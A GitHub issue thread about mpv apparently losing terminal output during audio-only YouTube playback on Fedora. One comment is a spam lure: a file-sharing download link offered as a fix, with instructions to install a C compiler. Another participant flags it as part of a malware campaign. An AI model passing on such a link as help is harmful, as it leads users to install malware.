### ISSUE TITLE
application mysteroisly eats output

### ISSUE THREAD

**Issue by solomoncyj** [mpv-player/mpv#14886]
### mpv Information

```bash
mpv 0.37.0 Copyright © 2000-2023 mpv/MPlayer/mplayer2 projects
libplacebo version: v6.338.2
FFmpeg version: 6.1.2
FFmpeg library versions:
   libavutil       58.29.100
   libavcodec      60.31.102
   libavformat     60.16.100
   libswscale      7.5.100
   libavfilter     9.12.100
   libswresample   4.12.100
```

### Important Information

```text
- Platform version:
Operating System: Fedora Linux 40
KDE Plasma Version: 6.1.4
KDE Frameworks Version: 6.5.0
Qt Version: 6.7.2
Kernel Version: 6.10.9-200.fc40.x86_64 (64-bit)
Graphics Platform: Wayland
Processors: 4 × Intel® Core™ i7-4510U CPU @ 2.00GHz
Memory: 15,0 GiB of RAM
Graphics Processor: 
Manufacturer: Hewlett-Packard
Product Name: HP ProBook 430 G2
System Version: A3009C510002
- GPU model, driver and version: Mesa Intel® HD Graphics 4400, 
- Source: fedora dnf repo
- Introduced in version: ???
```

### Reproduction Steps

mpv 'https://www.youtube.com/watch?v=Ud73fm4Uoq0' --no-video

### Expected Behavior

text to appear normaly, and not get eaten

### Actual Behavior

at around 2:30, stdout above the lyrics are 'eaten'

### Log File

[output.txt](https://github.com/user-attachments/files/17057512/output.txt)

### I carefully read all instruction and confirm that I did the following:

- [X] I tested with the latest mpv version to validate that the issue is not already fixed.
- [X] I provided all required information including system and mpv version.
- [X] I produced the log file with the exact same set of files, parameters, and conditions used in "Reproduction Steps", with the addition of `--log-file=output.txt`.
- [X] I produced the log file while the behaviors described in "Actual Behavior" were actively observed.
- [X] I attached the full, untruncated log file.
- [X] I attached the backtrace in the case of a crash.

**Comment by nhatlaso1** [comment]
maybe this will help
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
If you don't have the c compliator, install it.(gcc or clang)

**Comment by CounterPillow** [comment]
# Don't run the thing in the above comment, it's part of some malware spam campaign.

**Comment by solomoncyj** [comment]
> # Don't run the thing in the above comment, it's part of some malware spam campaign.

-could you please mark it as spam

**Comment by CounterPillow** [comment]
I can't as I don't have the permissions for doing that, but I have asked people with the permissions to do so.

**Comment by kasper93** [comment]
Was it full and stop eating output?
